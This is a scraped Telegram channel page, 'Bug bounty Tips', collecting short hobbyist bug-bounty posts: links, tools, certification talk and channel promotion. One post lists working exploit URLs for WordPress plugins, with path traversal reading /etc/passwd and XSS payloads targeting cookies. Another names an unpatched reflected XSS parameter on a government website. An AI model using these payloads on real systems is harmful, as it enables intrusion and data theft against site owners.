Bug bounty Tips

前往频道在 Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

显示更多

印度57 927 技术与应用17 484

5 806

订阅者

+624 小时

+737 天

+39930 天

460

帖子浏览量

~ 24024 小时

~ 31648 小时

7.93%

参与率

~ 3

每日帖子数

Ads index

beta

帖子存档

5 808

Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html

5 808

⚡️Wordpress Endpoints to look - check this if you have these plugin. ⚡️ /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd /wp-content/plugins/dzs-videogallery/admin/upload.php /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php /wp-content/plugins/hd-webplayer/playlist.php /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

5 808

What are the basic goal of good Reconnaissance

5 808

Deobfuscation and analysis of client-side JavaScript code to detect DOM-based XSS.

5 808

Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

5 808

Join the discussion group guys https://t.me/bug_hunting_talks

5 808

Exploring the dark and deep web.pdf1.64 MB

5 808

see it really works easy 5 min finding

5 808

today i got an intresting reflected xss, in karnataka gov website /kn where the lang_name param is vulnerable

5 808

☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services. 🔗https://github.com/Tib3rius/AutoRecon

5 808

Thanks, guys for this suggestion I was stuck but seeing the money and the content provided by hackthebox academy, i am planning to first take the CPT as it covers almost all the topics and also so many people says that the exam. Is more tougher than oscp, so after reading all those articles and redit suggestion and youtube review, I am planning to first complete the CPT, once done later I will take the OSCP. And I also suggest you guys this only if you are a beginner or a intermediate, first take the alternative courses to oscp, and once you get things done, you will get confident and later you can pass the oscp in one time. Bec it cost a lot........ 🤑💰

5 808

Actually I am using foreign number soo not to worry if It's ban in India.

5 808

Later on I will make a group

5 808

Join my WhatsApp channel

5 808

Follow the Tech Tips and_hacking channel on WhatsApp: https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A

5 808

Guys which cert do you suggest

Anonymous voting

5 808

How to perform a Vulnerability Assessment_ Step by step.pdf0.96 KB

5 808

https://medium.com/@pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce

5 808

Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!"

5 808

All Bug Bounty Platforms List.pdf3.84 KB